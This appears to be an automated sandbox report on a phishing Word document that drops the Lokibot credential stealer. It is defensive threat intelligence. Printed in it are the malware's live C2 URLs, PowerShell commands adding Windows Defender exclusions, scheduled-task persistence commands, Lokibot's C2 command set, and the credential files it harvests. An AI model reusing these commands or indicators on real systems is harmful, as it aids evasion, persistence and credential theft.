Edit tour

Windows Analysis Report
SCB REmittance Advice.doc

Overview

General Information

Sample name:	SCB REmittance Advice.doc
Analysis ID:	1446718
MD5:	a19ff7526e4447064c95123087783231
SHA1:	28cd27bb7050fb4f5534f584b83ca3be90d64ac8
SHA256:	bc6fe96306eb0dcd81bbe50db9e9996b01ca39b22efa79fce253d38532353051
Tags:	doc
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic

Yara detected Lokibot

.NET source code contains potential unpacker

.NET source code contains very large strings

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Document exploit detected (process start blacklist hit)

Injects a PE file into a foreign processes

Installs new ROOT certificates

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Equation Editor Network Connection

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Sigma detected: Suspicious Microsoft Office Child Process

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Binary contains a suspicious time stamp

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document contains embedded VBA macros

Document misses a certain OLE stream usually present in this Microsoft Office document type

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Searches the installation path of Mozilla Firefox

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores large binary data to the registry

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 200 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 2740 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

sharon38892.exe (PID: 2912 cmdline: "C:\Users\user\AppData\Roaming\sharon38892.exe" MD5: 0B67ADEB422396C047E87FA78A9E8E80)

powershell.exe (PID: 3128 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\sharon38892.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

powershell.exe (PID: 3160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

schtasks.exe (PID: 3204 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp5C05.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

sharon38892.exe (PID: 3376 cmdline: "C:\Users\user\AppData\Roaming\sharon38892.exe" MD5: 0B67ADEB422396C047E87FA78A9E8E80)

EQNEDT32.EXE (PID: 3904 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

taskeng.exe (PID: 3424 cmdline: taskeng.exe {E2BA91ED-D885-4B20-9033-3784D17E4A5D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)

XxENUzWteJXT.exe (PID: 3472 cmdline: C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe MD5: 0B67ADEB422396C047E87FA78A9E8E80)

powershell.exe (PID: 3548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

powershell.exe (PID: 3584 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)

schtasks.exe (PID: 3700 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XxENUzWteJXT" /XML "C:\Users\user\AppData\Local\Temp\tmp7D2B.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)

XxENUzWteJXT.exe (PID: 3796 cmdline: "C:\Users\user\AppData\Roaming\XxENUzWteJXT.exe" MD5: 0B67ADEB422396C047E87FA78A9E8E80)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "rocheholding.top/evie3/five/fre.php"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
SCB REmittance Advice.doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x8f7b:$obj2: \objdata 0x8f91:$obj3: \objupdate 0x8f57:$obj4: \objemb

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.618205629.00000000005A0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x174d0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x489b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000005.00000002.366276144.00000000031A3000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x130df:$des3: 68 03 66 00 00 0x174d0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1759c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x799d0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x66d9b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000005.00000002.366276144.00000000033A6000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x755df:$des3: 68 03 66 00 00 0x799d0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x79a9c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000015.00000002.378888249.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x9320c:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x805bf:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000E.00000002.383558697.00000000021F7000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x8ee03:$des3: 68 03 66 00 00 0x9320c:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x932d8:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x95b64:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x82f17:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000005.00000002.366140097.0000000002187000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x9175b:$des3: 68 03 66 00 00 0x95b64:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x95c30:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: sharon38892.exe PID: 2912	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: sharon38892.exe PID: 2912	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: sharon38892.exe PID: 2912	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x551a8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0xda600:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: sharon38892.exe PID: 3376	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: XxENUzWteJXT.exe PID: 3472	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: XxENUzWteJXT.exe PID: 3472	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: XxENUzWteJXT.exe PID: 3472	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x27251:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: XxENUzWteJXT.exe PID: 3796	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: XxENUzWteJXT.exe PID: 3796	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: XxENUzWteJXT.exe PID: 3796	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x4f77:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 38 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
21.2.XxENUzWteJXT.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
21.2.XxENUzWteJXT.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
21.2.XxENUzWteJXT.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
21.2.XxENUzWteJXT.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
21.2.XxENUzWteJXT.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
21.2.XxENUzWteJXT.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
21.2.XxENUzWteJXT.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
21.2.XxENUzWteJXT.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
5.2.sharon38892.exe.31a30e0.12.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.2.sharon38892.exe.31a30e0.12.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
5.2.sharon38892.exe.31a30e0.12.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
5.2.sharon38892.exe.31a30e0.12.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
5.2.sharon38892.exe.31a30e0.12.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.2.sharon38892.exe.34085e0.11.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.2.sharon38892.exe.34085e0.11.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
5.2.sharon38892.exe.34085e0.11.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
5.2.sharon38892.exe.34085e0.11.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
5.2.sharon38892.exe.34085e0.11.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.2.sharon38892.exe.34085e0.11.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
5.2.sharon38892.exe.34085e0.11.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.2.sharon38892.exe.34085e0.11.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.sharon38892.exe.34085e0.11.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
5.2.sharon38892.exe.34085e0.11.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
5.2.sharon38892.exe.34085e0.11.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
5.2.sharon38892.exe.34085e0.11.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.2.sharon38892.exe.34085e0.11.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
5.2.sharon38892.exe.31a30e0.12.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
5.2.sharon38892.exe.31a30e0.12.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.2.sharon38892.exe.31a30e0.12.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.sharon38892.exe.31a30e0.12.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
5.2.sharon38892.exe.31a30e0.12.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
5.2.sharon38892.exe.31a30e0.12.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
5.2.sharon38892.exe.31a30e0.12.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.2.sharon38892.exe.31a30e0.12.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
21.2.XxENUzWteJXT.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
21.2.XxENUzWteJXT.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
21.2.XxENUzWteJXT.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
21.2.XxENUzWteJXT.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
21.2.XxENUzWteJXT.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
21.2.XxENUzWteJXT.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
21.2.XxENUzWteJXT.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
